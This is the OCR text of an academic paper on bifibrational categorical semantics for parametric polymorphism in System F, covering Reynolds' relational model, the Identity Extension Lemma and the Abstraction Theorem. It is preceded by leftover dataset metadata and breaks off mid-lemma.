66], [46781, 47134, 67], [47134, 47408, 68], [47408, 47660, 69], [47660, 48262, 70], [48262, 48455, 71], [48455, 49347, 72], [49347, 50659, 73], [50659, 51633, 74], [51633, 52922, 75], [52922, 55150, 76], [55150, 57196, 77], [57196, 59181, 78], [59181, 61185, 79], [61185, 63986, 80], [63986, 65688, 81], [65688, 66861, 82], [66861, 68027, 83], [68027, 68127, 84], [68127, 68628, 85]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 68628, 0.02119]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
d255ecd5a38c3b7131d51f5a211becd85b180fd6
[REMOVED]
{"len_cl100k_base": 14357, "olmocr-version": "0.1.53", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 61263, "total-output-tokens": 16732, "length": "2e13", "weborganizer": {"__label__adult": 0.00036406517028808594, "__label__art_design": 0.0007910728454589844, "__label__crime_law": 0.0005946159362792969, "__label__education_jobs": 0.00991058349609375, "__label__entertainment": 0.00016605854034423828, "__label__fashion_beauty": 0.00029206275939941406, "__label__finance_business": 0.001033782958984375, "__label__food_dining": 0.0004162788391113281, "__label__games": 0.0007739067077636719, "__label__hardware": 0.0013513565063476562, "__label__health": 0.0007925033569335938, "__label__history": 0.0006542205810546875, "__label__home_hobbies": 0.00022041797637939453, "__label__industrial": 0.0007348060607910156, "__label__literature": 0.0006036758422851562, "__label__politics": 0.0004911422729492188, "__label__religion": 0.0005545616149902344, "__label__science_tech": 0.36962890625, "__label__social_life": 0.0003075599670410156, "__label__software": 0.04132080078125, "__label__software_dev": 0.56787109375, "__label__sports_fitness": 0.00022542476654052737, "__label__transportation": 0.0005335807800292969, "__label__travel": 0.00024247169494628904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63856, 0.03076]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63856, 0.44621]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63856, 0.88846]], "google_gemma-3-12b-it_contains_pii": [[0, 1931, false], [1931, 7235, null], [7235, 12119, null], [12119, 17743, null], [17743, 19944, null], [19944, 23667, null], [23667, 27912, null], [27912, 33265, null], [33265, 35221, null], [35221, 40874, null], [40874, 44887, null], [44887, 47880, null], [47880, 49962, null], [49962, 51595, null], [51595, 55551, null], [55551, 61262, null], [61262, 63856, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1931, true], [1931, 7235, null], [7235, 12119, null], [12119, 17743, null], [17743, 19944, null], [19944, 23667, null], [23667, 27912, null], [27912, 33265, null], [33265, 35221, null], [35221, 40874, null], [40874, 44887, null], [44887, 47880, null], [47880, 49962, null], [49962, 51595, null], [51595, 55551, null], [55551, 61262, null], [61262, 63856, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63856, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63856, null]], "pdf_page_numbers": [[0, 1931, 1], [1931, 7235, 2], [7235, 12119, 3], [12119, 17743, 4], [17743, 19944, 5], [19944, 23667, 6], [23667, 27912, 7], [27912, 33265, 8], [33265, 35221, 9], [35221, 40874, 10], [40874, 44887, 11], [44887, 47880, 12], [47880, 49962, 13], [49962, 51595, 14], [51595, 55551, 15], [55551, 61262, 16], [61262, 63856, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63856, 0.1046]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
407eb2fcd9a33037c6778dd766176c46318a64f4
[REMOVED]
{"Source-Url": "https://repositorio.inesctec.pt/server/api/core/bitstreams/75e4b5fa-f92c-4dfc-b0dc-fd1098ffa640/content", "len_cl100k_base": 8714, "olmocr-version": "0.1.49", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 42688, "total-output-tokens": 10603, "length": "2e13", "weborganizer": {"__label__adult": 0.00032067298889160156, "__label__art_design": 0.00022017955780029297, "__label__crime_law": 0.0002956390380859375, "__label__education_jobs": 0.0004715919494628906, "__label__entertainment": 5.036592483520508e-05, "__label__fashion_beauty": 0.00011837482452392578, "__label__finance_business": 0.00012409687042236328, "__label__food_dining": 0.00027441978454589844, "__label__games": 0.00034809112548828125, "__label__hardware": 0.00041604042053222656, "__label__health": 0.00031566619873046875, "__label__history": 0.0001531839370727539, "__label__home_hobbies": 5.328655242919922e-05, "__label__industrial": 0.0002880096435546875, "__label__literature": 0.0002199411392211914, "__label__politics": 0.00022220611572265625, "__label__religion": 0.0004405975341796875, "__label__science_tech": 0.004947662353515625, "__label__social_life": 7.05718994140625e-05, "__label__software": 0.00392913818359375, "__label__software_dev": 0.98583984375, "__label__sports_fitness": 0.0002415180206298828, "__label__transportation": 0.0003919601440429687, "__label__travel": 0.00015819072723388672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45928, 0.02354]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45928, 0.74925]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45928, 0.88038]], "google_gemma-3-12b-it_contains_pii": [[0, 2432, false], [2432, 5398, null], [5398, 7774, null], [7774, 10878, null], [10878, 11990, null], [11990, 14204, null], [14204, 17456, null], [17456, 20333, null], [20333, 23618, null], [23618, 26742, null], [26742, 30103, null], [30103, 33272, null], [33272, 35907, null], [35907, 38791, null], [38791, 42040, null], [42040, 45078, null], [45078, 45928, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2432, true], [2432, 5398, null], [5398, 7774, null], [7774, 10878, null], [10878, 11990, null], [11990, 14204, null], [14204, 17456, null], [17456, 20333, null], [20333, 23618, null], [23618, 26742, null], [26742, 30103, null], [30103, 33272, null], [33272, 35907, null], [35907, 38791, null], [38791, 42040, null], [42040, 45078, null], [45078, 45928, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45928, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45928, null]], "pdf_page_numbers": [[0, 2432, 1], [2432, 5398, 2], [5398, 7774, 3], [7774, 10878, 4], [10878, 11990, 5], [11990, 14204, 6], [14204, 17456, 7], [17456, 20333, 8], [20333, 23618, 9], [23618, 26742, 10], [26742, 30103, 11], [30103, 33272, 12], [33272, 35907, 13], [35907, 38791, 14], [38791, 42040, 15], [42040, 45078, 16], [45078, 45928, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45928, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
3acffcdb24c49f7ec820f74cecd8fd55c2955a4b
Bifibrational functorial semantics of parametric polymorphism Neil Ghani\textsuperscript{a} Patricia Johann\textsuperscript{b} Fredrik Nordvall Forsberg\textsuperscript{a} Federico Orsanigo\textsuperscript{a} Tim Revell\textsuperscript{a} \textsuperscript{a} University of Strathclyde, UK \textsuperscript{b} Appalachian State University, USA Abstract Reynolds’ theory of parametric polymorphism captures the invariance of polymorphically typed programs under change of data representation. Semantically, reflexive graph categories and fibrations are both known to give a categorical understanding of parametric polymorphism. This paper contributes further to this categorical perspective by showing the relevance of bifibrations. We develop a bifibrational framework for models of System F that are parametric, in that they verify the Identity Extension Lemma and Reynolds’ Abstraction Theorem. We also prove that our models satisfy expected properties, such as the existence of initial algebras and final coalgebras, and that parametricity implies dinaturality. Keywords: Parametricity, logical relations, System F, fibred category theory. 1 Introduction Strachey [30] called a polymorphic function parametric if its behaviour is uniform across all of its type instantiations. Reynolds [25] made this mathematically precise by formulating the notion of relational parametricity, in which the uniformity of parametric polymorphic functions is captured by requiring them to preserve all logical relations between instantiated types. Relational parametricity has proven to be a key technique for formally establishing properties of software systems, such as representation independence [1,6], equivalences between programs [15], and useful (“free”) theorems about programs from their types alone [31]. In this paper, we treat relational parametricity for the polymorphic \(\lambda\)-calculus System F [10], which forms the core of many modern programming languages and verification systems. Hermida, Reddy, and Robinson [14] give a good introduction to relational parametricity. Since category theory underpins and informs many of the key ideas underlying modern programming languages, it is natural to ask whether it can provide a useful perspective on parametricity as well. Ma and Reynolds [19] developed the first categorical formulation of relational parametricity, but their models were complicated and challenging to understand. Moreover, Birkedal and Rosolini discovered that not all expected consequences of parametricity necessarily hold in their models (see [4]). Another line of work, begun by O’Hearn and Tennent [21] and Robinson and Rosolini [28], and later refined by Dunphy and Reddy [7], uses reflexive graphs to model relations and functors between reflexive graph categories to model types. This is the state of the art for functorial semantics for parametric polymorphism. Interpreting types as functors is conceptually elegant and Dunphy and Reddy show that this framework is powerful enough to prove expected results, such as the existence of initial algebras for strictly positive type expressions [5]. However, since reflexive graph categories are relatively unknown mathematical structures, much of this development has had to be carried out from scratch. We propose to instead take the more established fibrational view of logic from the outset, and thus to analyse parametricity through the powerful lens of categorical type theory [16]. In doing so, we follow an extensive line of work by Hermida [12,13] and Birkedal and Møgelberg [4], who use fibrations to construct sophisticated categorical models not only of parametricity, but also of its logical structure in terms of Abadi-Plotkin logic [24]. Abadi-Plotkin logic is a formal logic for parametric polymorphism that includes predicate logic and a polymorphic lambda calculus, and thus requires significant machinery to handle. Using this machinery, Birkedal and Møgelberg are able to go beyond Dunphy and Reddy’s results and, for instance, prove that all positive type expressions — not just the strictly positive ones as for Dunphy and Reddy — have initial algebras. However, these impressive results come at the price of the complexity of the notions involved. Our aim is to achieve the same results in a simpler setting, closer to Dunphy and Reddy’s functorial semantics. We end up with a notion of model in which each type is interpreted as an equality preserving fibred functor and each term is interpreted as a fibred natural transformation. This is quite similar to the models produced by the parametric completion process of Robinson and Rosolini [28] (see also Birkedal and Møgelberg [4, Section 8]) and to Mitchell and Scedrov’s relator model [20], but with a more general notion of relation given by a fibration. We thus combine the generality of Birkedal and Møgelberg’s fibrational models with the simplicity of Dunphy and Reddy’s functorial semantics. Our central innovation is the use of bifibrations to achieve this “sweet spot” in the study of parametricity. This is not necessary for the definition of our framework, for which Lawvere equality [17] (i.e., opreindexing along diagonals only) suffices, but it helps considerably with both the concrete interpretation of ∀-types [9] and the handling of graph relations. At a technical level, our strongest result is to use our simpler framework to recover all the expected consequences of parametricity that Birkedal and Møgelberg [4] prove using Abadi-Plotkin logic. In particular, we go beyond Dunphy and Reddy’s result by deriving, this time with a functorial semantics, initial algebras for all positive type expressions, rather than just for strictly positive ones. Nevertheless, this paper is in no way intended as the final word on fibrational parametricity. Instead, we hope the simple re-conceptualization of parametricity we offer here — replacing the usual categorical interpretations of types as functors and --- 1 We stress again that we are not trying to model all of Abadi-Plotkin logic, but rather only type systems involving parametric polymorphism. Indeed, with respect to Abadi-Plotkin logic, we could not hope to improve upon the results of Birkedal and Møgelberg [4], who give a sound and complete semantics. terms as natural transformations with their fibred counterparts — will open the way to the study of parametricity in richer settings, e.g., proof-relevant ones. **Structure of the paper:** In Section 2 we give a short introduction to bifibrations. We recall Reynolds’ relational interpretation of System F, the Identity Extension Lemma and the Abstraction Theorem in Section 3. We then extract bifibrational generalisations of these in Section 4, and construct our parametric models. In Section 5 we show that our models behave as expected by deriving initial algebras for all definable functors and proving that parametricity implies (di)naturality. Finally, we instantiate our framework to derive both “standard” and new models of relational parametricity in Section 6. Section 7 concludes and discusses future work. ## 2 A Fibrational Toolbox for Relational Parametricity We give a brief introduction to fibrations; more details can be found in, e.g., [16]. **Definition 2.1** Let $U : \mathcal{E} \to \mathcal{B}$ be a functor. A morphism $g : Q \to P$ in $\mathcal{E}$ is cartesian over $f : X \to Y$ in $\mathcal{B}$ if $Ug = f$ and, for every $g' : Q' \to P$ in $\mathcal{E}$ with $Ug' = f \circ v$ for some $v : UQ' \to X$, there exists a unique $h : Q' \to Q$ with $Uh = v$ and $g' = g \circ h$. A morphism $g : P \to Q$ in $\mathcal{E}$ is opcartesian over $f : X \to Y$ in $\mathcal{B}$ if $Ug = f$ and, for every $g' : P \to Q'$ in $\mathcal{E}$ with $Ug' = v \circ f$ for some $v : Y \to UQ'$, there exists a unique $h : Q \to Q'$ with $Uh = v$ and $g' = h \circ g$. We write $f^p_\mathcal{E}$ for the cartesian morphism over $f$ with codomain $P$, and $f^p_\mathcal{E}$ for the opcartesian morphism over $f$ with domain $P$. Such morphisms are unique up to isomorphism. If $P$ is an object of $\mathcal{E}$ then we write $f^*P$ for the domain of $f^p_\mathcal{E}$ and $\Sigma fP$ for the codomain of $f^p_\mathcal{E}$. **Definition 2.2** A functor $U : \mathcal{E} \to \mathcal{B}$ is a fibration if for every object $P$ of $\mathcal{E}$ and every morphism $f : X \to UP$ in $\mathcal{B}$, there is a cartesian morphism $f^p_\mathcal{E} : Q \to P$ in $\mathcal{E}$ over $f$. Similarly, $U$ is an opfibration if for every object $P$ of $\mathcal{E}$ and every morphism $f : UP \to Y$ in $\mathcal{B}$, there is an opcartesian morphism $f^p_\mathcal{E} : P \to Q$ in $\mathcal{E}$ over $f$. A functor $U$ is a bifibration if it is both a fibration and an opfibration. If $U : \mathcal{E} \to \mathcal{B}$ is a fibration, opfibration, or bifibration, then $\mathcal{E}$ is its total category and $\mathcal{B}$ is its base category. An object $P$ in $\mathcal{E}$ is over its image $UP$ and similarly for morphisms. A morphism is vertical if it is over id. We write $\mathcal{E}_X$ for the fibre over an object $X$ in $\mathcal{E}$, i.e., the subcategory of $\mathcal{E}$ of objects over $X$ and morphisms over $\text{id}_X$. For $f : X \to Y$ in $\mathcal{B}$, the function mapping each object $P$ of $\mathcal{E}$ to $f^*P$ extends to a functor $f^* : \mathcal{E}_Y \to \mathcal{E}_X$ mapping each morphism $k : P \to P'$ in $\mathcal{E}_Y$ to the morphism $f^*k$ with $k^p_\mathcal{E} = f^p_\mathcal{E}.f^*k$. The universal property of $f^p_\mathcal{E}$ ensures the existence and uniqueness of $f^*k$. We call $f^*$ the reindexing functor along $f$. A similar situation holds for opfibrations; the functor $\Sigma f : \mathcal{E}_X \to \mathcal{E}_Y$ extending the function mapping each object $P$ of $\mathcal{E}$ to $\Sigma fP$ is the oprehindexing functor along $f$. We write $|\mathcal{C}|$ for the discrete category of $\mathcal{C}$. If $U : \mathcal{E} \to \mathcal{B}$ is a functor, then the discrete functor $|U| : |\mathcal{E}| \to |\mathcal{B}|$ is induced by the restriction of $U$ to $|\mathcal{E}|$. If $n \in \mathbb{N}$, then $\mathcal{E}^n$ denotes the $n$-fold product of $\mathcal{E}$ in $\mathbf{Cat}$. The $n$-fold product of $U$, denoted $U^n : \mathcal{E}^n \to \mathcal{B}^n$, is the functor defined by $U^n(X_1, ..., X_n) = (UX_1, ..., UX_n)$. Lemma 2.3 If \( U : \mathcal{E} \to \mathcal{B} \) is a functor then \( |U| : |\mathcal{E}| \to |\mathcal{B}| \) is a bifibration. If \( U \) is a (bi)fibration then so is \( U^n : \mathcal{E}^n \to \mathcal{B}^n \) for any natural number \( n \). To formulate Reynolds’ set-theoretic model of relational parametricity categorically, we define the category \( \text{Rel} \) of relations over \( \text{Set} \) and the relations fibration on \( \text{Set} \) [16]. **Definition 2.4** The category \( \text{Rel} \) has triples \((A, B, R)\) as objects, where \( A, B \), and \( R \) are sets and \( R \subseteq A \times B \). A morphism \((A, B, R) \to (A', B', R')\) is a pair \((f, g)\), where \( f : A \to A' \) and \( g : B \to B' \), such that if \((a, b) \in R\) then \((fa, gb) \in R'\). We write \((A, B, R)\) as just \( R \) when \( A \) and \( B \) are immaterial or clear from context. Note that \( \text{Rel} \) is not the category whose objects are sets and whose morphisms are relations, which also sometimes appears in the literature. Each set \( A \) has an associated equality relation defined by \( \text{Eq} A = \{(a, a) \mid a \in A\} \). **Example 2.5** The functor \( U : \text{Rel} \to \text{Set} \times \text{Set} \) sending \((A, B, R)\) to \((A, B)\) is called the relations fibration on \( \text{Set} \). To see that \( U \) is indeed a fibration, let \((f, g) : (X_1, X_2) \to (Y_1, Y_2)\) be a morphism in \( \text{Set} \times \text{Set} \) with \( UR = (Y_1, Y_2) \) for some \( R \) in \( \text{Rel} \). If we define \((f, g)^* R \subseteq X_1 \times X_2 \) by \((x_1, x_2) \in (f, g)^* R \) iff \((fx_1, gx_2) \in R\), then \((f, g)\) is a cartesian morphism from \((f, g)^* R\) to \( R \) over \((f, g)\). It is also easy to see that \( U \) is an opfibration, with opreindexing given by forward image. Thus, \( U \) is a bifibration. We denote the fibre over \((A, B)\) in the relations fibration on \( \text{Set} \) by \( \text{Rel}(A, B) \). **Definition 2.6** Let \( U : \mathcal{E} \to \mathcal{B} \) and \( U' : \mathcal{E}' \to \mathcal{B}' \) be fibrations. A fibred functor \( F : U \to U' \) comprises two functors \( F_0 : \mathcal{B} \to \mathcal{B}' \) and \( F_1 : \mathcal{E} \to \mathcal{E}' \) such that \( U'F_1 = F_0U \) and cartesian morphisms are preserved, i.e., if \( f \) is cartesian in \( \mathcal{E} \) over \( g \) in \( \mathcal{B} \) then \( F_1f \) is cartesian in \( \mathcal{E}' \) over \( F_0g \) in \( \mathcal{B}' \). If \( F' : U \to U' \) is another fibred functor, then a fibred natural transformation \( \eta : F \to F' \) comprises two natural transformations \( \eta_0 : F_0 \to F'_0 \) and \( \eta_1 : F_1 \to F'_1 \) such that \( U'\eta_1 = \eta_0 U \). In this paper we use fibred functors and fibred transformations to interpret System F types and terms, and show that under mild conditions this gives parametric models. # 3 Reynolds’ Model of Relational Parametricity We now describe Reynolds’ set-theoretic model of relational parametricity: first concretely, and then in terms of the relations fibration \( \text{Rel} \to \text{Set} \times \text{Set} \). As Reynolds discovered, there are in fact no set-theoretic models if the meta-theory is classical logic [26], but the following makes sense in the (intuitionistic) internal language of a topos [22], or in the Calculus of Constructions with impredicative \( \text{Set} \). Throughout, we assume a standard syntax for System F. ## 3.1 Semantics of Types Reynolds presents two “parallel” semantics for System F: a standard set-based semantics \( [\cdot]_o \), and a relational semantics \( [\cdot]_r \). Given \( \Gamma \vdash T \) type, where the type context \( \Gamma \) contains \( |\Gamma| = n \) type variables, Reynolds defines interpretations \( [T]_o : \text{Set}^n \to \text{Set} \) and \( [T]_r : \text{Rel}^n(A, B) \to \text{Rel}([T]_oA, [T]_oB) \) by structural induction on type judgements as follows: Type variables: \( [X_i]_o A = A_i \) and \( [X_i]_r R = R_i \) Arrow types: \[ [T_1 \to T_2]_o A = [T_1]_o A \to [T_2]_o A \] \[ [T_1 \to T_2]_r R = \{ (f,g) \mid (a,b) \in [T_1]_r R \Rightarrow (fa,gb) \in [T_2]_r R \} \] Forall types: \[ [\forall X.T]_o A = \{ f : \prod_{S: \text{Set}} [T]_o (A,S) \mid \forall R' \in \text{Rel}(A',B') . (fA',fB') \in [T]_r (\text{Eq} A,R') \} \] \[ [\forall X.T]_r R = \{ (f,g) \mid \forall R' \in \text{Rel}(A',B') . (fA',gB') \in [T]_r (R,R') \} \] The definitions of \( [\forall X.T]_o \) and \( [\forall X.T]_r \) depend crucially on one another. Thus, we do not really have two semantics — one based on \( \text{Set} \) and one based on \( \text{Rel} \) — but rather a single semantics based on the relations fibration \( U : \text{Rel} \to \text{Set} \times \text{Set} \). In other words, Reynolds’ definitions of \([[-]]_o\) and \([[-]]_r\) entail the following theorem: **Theorem 3.1 (Fibrational Semantics of Types)** Let \( U \) be the relations fibration on \( \text{Set} \). Every judgement \( \Gamma \vdash T \) induces a fibred functor \( [T] : [U[\Gamma]] \to U \). \[ \begin{array}{ccc} |\text{Rel}|[\Gamma] & \xrightarrow{[T]_r} & \text{Rel} \\ \downarrow{[U[\Gamma]]} & & \downarrow{U} \\ |\text{Set}|[\Gamma] \times |\text{Set}|[\Gamma] & \xrightarrow{[T]_o \times [T]_r} & \text{Set} \times \text{Set} \end{array} \] Since the domain of \( [T]_r \) is a discrete category, requiring that \( [T] \) is a fibred functor amounts simply to requiring that the above diagram commutes. In particular, no preservation of cartesian morphisms by \( [T]_r \) is needed. Reynolds does not give a functorial action of types on morphisms. This is reflected in the appearance of discrete categories in Theorem 3.1. As a result, Reynolds’ pointwise interpretation of function spaces is the exponential in the functor category \( [U[\Gamma]] \to U \) [27]. How parametricity treats the action on morphisms will become clear in Section 5.1; instead of acting on morphisms, the interpretation of types act on graph relations induced by morphisms. For now, we simply note that the use of discrete domains does not take us out of the fibrational framework; Lemma 2.3 ensures that \( [T] \) is a functor between fibrations. The Identity Extension Lemma (IEL) is key for many applications of parametricity. It says that every relational interpretation preserves equality relations:\footnote{Reynolds’ approach also handles “identity relations” that are not equality relations, such as the information order on domains. In this paper, like many others [2,4,13,24], we only treat equality relations. In future work, we hope to give an axiomatic account of “identity relations” similar to that of Dunphy and Reddy [7].} **Lemma 3.2 (IEL)** If \( \Gamma \vdash T \) then \( [T]_r \circ \text{Eq}[\Gamma] = \text{Eq} \circ [T]_o \). \( \square \) 3.2 Semantics of Terms Reynolds’ main result is his Abstraction Theorem, stating that all terms send related environments to related values. Reynolds first gives set-valued and relational interpretations of term contexts $\Delta = x_1 : T_1, \ldots, x_n : T_n$ by defining $\llbracket \Delta \rrbracket_o = [T_1]_o \times \cdots \times [T_n]_o$ and $\llbracket \Delta \rrbracket_r = [T_1]_r \times \cdots \times [T_n]_r$. This defines a fibred functor $\llbracket \Delta \rrbracket : [U]^{\|T\|} \to U$. Reynolds then interprets each judgement $\Gamma; \Delta \vdash t : T$ as a family of functions $\llbracket t \rrbracket_o : \llbracket \Delta \rrbracket_o S \to [T]_o S$ for each environment $S \in \llbracket \text{Set} \rrbracket^{\|T\|}$. We omit the standard definition of $\llbracket t \rrbracket_o$ here. Finally, Reynolds proves: **Theorem 3.3 (Abstraction Theorem)** Let $A, B \in \llbracket \text{Set} \rrbracket^{|T|}$, $R \in \llbracket \text{Rel} \rrbracket^{|T|}(A, B)$, $a \in [\Delta]_o A$, and $b \in [\Delta]_o B$. For every term $\Gamma; \Delta \vdash t : T$, if $(a, b) \in [\Delta]_r R$, then $(\llbracket t \rrbracket_o A a, \llbracket t \rrbracket_o B b) \in [T]_o R$. Or, more concisely, fibrationally: every judgement $\Gamma; \Delta \vdash t : T$ is interpreted as a fibred natural transformation $(\llbracket t \rrbracket_o, \llbracket t \rrbracket_r) : [\Delta] \to [T]$. \[ \begin{array}{ccc} \text{Rel} & \xrightarrow{\llbracket \Delta \rrbracket_r} & \text{Rel} \\ \llbracket U \rrbracket^{\|T\|} & \downarrow & \downarrow \llbracket t \rrbracket_r \\ \llbracket \text{Set} \rrbracket^{\|T\|} \times \llbracket \text{Set} \rrbracket^{\|T\|} & \xrightarrow{\llbracket \Delta \rrbracket_o \times \llbracket \Delta \rrbracket_o} & \llbracket \text{Set} \rrbracket \times \llbracket \text{Set} \rrbracket \\ \end{array} \] \[\Box\] It is worthwhile to unpack the fibational statement of the theorem: Since the domains of the functors $\llbracket \Delta \rrbracket_o$ and $[T]_o$ are discrete, the interpretation $\llbracket t \rrbracket_o$ actually defines a (vacuously natural) transformation $\llbracket t \rrbracket_o : [\Delta]_o \to [T]_o$. By the definition of morphisms in the category Rel, the existence of the (again, vacuously natural) transformation $\llbracket t \rrbracket_r$ over $[\Delta]_o \times [t]_o$ is exactly the statement that if $(a, b) \in [\Delta]_r R$, then $(\llbracket t \rrbracket_o A a, \llbracket t \rrbracket_o B b) \in [T]_o R$ — the verbose conclusion of the theorem. Reynolds’ original formulation of the Abstraction Theorem makes it seem at first glance as though it asserts a property of $[t]_o$. Surprisingly, however, our fibrical version makes it clear that the Abstraction Theorem actually states the existence of additional algebraic structure given by $[t]_r$, and, more generally, the interpretation of terms as fibred natural transformations. Taking this point of view and exposing this heretofore hidden structure opens the way to our bifibrational generalisation of Reynolds’ model. 4 Bifibrational Relational Parametricity Thus far we have only shown how to view Reynolds’ notion of parametricity in terms of the specific fibration $U : \text{Rel} \to \text{Set} \times \text{Set}$. We now generalise this to other fibrations. This requires that we generalise $[-]_o$ and $[-]_r$ in such a way that the IEL and the Abstraction Theorem hold, which in turn requires that we define equality functors for these other fibrations. The construction of equality functors is standard in any fibration with the necessary infrastructure [16], but we briefly describe it here for completeness. The first step is to note that the relations fibration from Example 2.5 arises from the subobject fibration over $\text{Set}$ by so-called change of base (or pullback), and to generalise that construction. Definition 4.1 Let $U : \mathcal{E} \to \mathcal{B}$ be a fibration and suppose $\mathcal{B}$ has products. The fibration $\text{Rel}(U) : \text{Rel}(\mathcal{E}) \to \mathcal{B} \times \mathcal{B}$ is defined by the following change of base: \[ \begin{array}{ccc} \text{Rel}(\mathcal{E}) & \rightarrow & \mathcal{E} \\ \downarrow & & \downarrow \\ \text{Rel}(U) & \rightarrow & U \\ \mathcal{B} \times \mathcal{B} & \rightarrow & \mathcal{B} \end{array} \] We call $\text{Rel}(U)$ the \textit{relations fibration for} $U$, and call the objects of $\text{Rel}(\mathcal{E})$ relations on $\mathcal{B}$, to emphasise that this construction generalises the relations fibration on $\text{Set}$. We say that a fibration $U : \mathcal{E} \to \mathcal{B}$ has \textit{fibred terminal objects} if each fibre $\mathcal{E}_X$ of $\mathcal{E}$ has a terminal object, and if reindexing preserves these terminal objects. The map sending each object $X$ of $\mathcal{B}$ to the terminal object in $\mathcal{E}_X$ extends to a \textit{functor} $K : \mathcal{B} \to \mathcal{E}$ called the \textit{truth functor} for $U$. We can construct an \textit{equality functor} for $\text{Rel}(U)$ from the truth functor $K$ for $U$ as follows: \[ \text{Definition 4.2} \quad \text{Let } U : \mathcal{E} \to \mathcal{B} \text{ be a bifibration with fibred terminal objects. If } \mathcal{B} \text{ has products, then the map } X \mapsto \Sigma_{\delta_X} K X, \text{ where } \delta_X : X \to X \times X, \text{ extends to the equality functor } \text{Eq} : \mathcal{B} \to \text{Rel}(\mathcal{E}) \text{ for } \text{Rel}(U). \] For this definition, it is enough to ask for opreindexing along diagonals $\delta_X$ only (this is what Birkedal and Møgelberg [4] do to model equality). When dealing with graph relations in Section 5.1, though, we will use all of the opfibrational structure to opreindex along arbitrary morphisms. Our definition specialises to the equality relation $\text{Eq} A$ when instantiated to the relations fibration on $\text{Set}$. The equality functor is faithful, but not always full; a counterexample is the equality functor for the identity bifibration $\text{Id} : \text{Set} \to \text{Set}$, which gives a model with \textit{ad hoc}, rather than parametric, polymorphic functions. We thus assume in the rest of this paper that equality functors are full. This is reminiscent of Birkedal and Møgelberg’s [4] assumption that the fibration has \textit{very strong equality}, i.e., that internal equality implies external equality, in the following sense: fullness says that if $(f, g, \alpha) : 1 \rightarrow \text{Eq} \mathcal{Y}$ (i.e., $\alpha$ shows that $f = g$ internally), then, since $1 = \text{Eq} 1_{\mathcal{B}}$, $(f, g, \alpha) = (h, h, \text{Eq} h)$ for some $h : 1_{\mathcal{B}} \rightarrow \mathcal{Y}$ (i.e., $f = g$ externally). We use fullness of $\text{Eq}$ at several places in Section 5 below. We now show how to interpret arrow types and forall types as fibred functors with discrete domains. We then show that a particular class of such functors forms a $\lambda 2$-fibration and thus a model of System F which is, in fact, parametric. 4.1 Interpreting Arrow Types The definition of $[T \to U]_o$ and $[T \to U]_r$ in Section 3.1 is derived from the cartesian closed structure of $\text{Set}$ and $\text{Rel}$, respectively. Moreover, the fibration $U : \text{Rel} \to \text{Set} \times \text{Set}$ preserves the cartesian closed structure, so that $[t]_r$ is over $[t]_o \times [t]_o$ as required by the Abstraction Theorem. Generalising from this fibration, we can model arrow types “parametrically” — i.e., in a way satisfying the Abstraction Theorem — in any fibration $U : \mathcal{E} \to \mathcal{B}$ in which $\mathcal{E}$ and $\mathcal{B}$ are cartesian closed categories (CCCs) and $U$ preserves cartesian closedness. **Definition 4.3** A fibration \( U : \mathcal{E} \to \mathcal{B} \) is an arrow fibration if both \( \mathcal{E} \) and \( \mathcal{B} \) are CCCs, and \( U \) preserves the cartesian closed structure. A relations fibration \( \text{Rel}(U) \) is an equality preserving arrow fibration if it is an arrow fibration and \( \text{Eq} : \mathcal{B} \to \text{Rel}(\mathcal{E}) \) preserves exponentials. One advantage of working with well-studied mathematical structures such as fibrations is that many of their properties can be found in the literature. This helps in determining when a relations fibration is an equality preserving arrow fibration: **Lemma 4.4** Let \( U : \mathcal{E} \to \mathcal{B} \) be 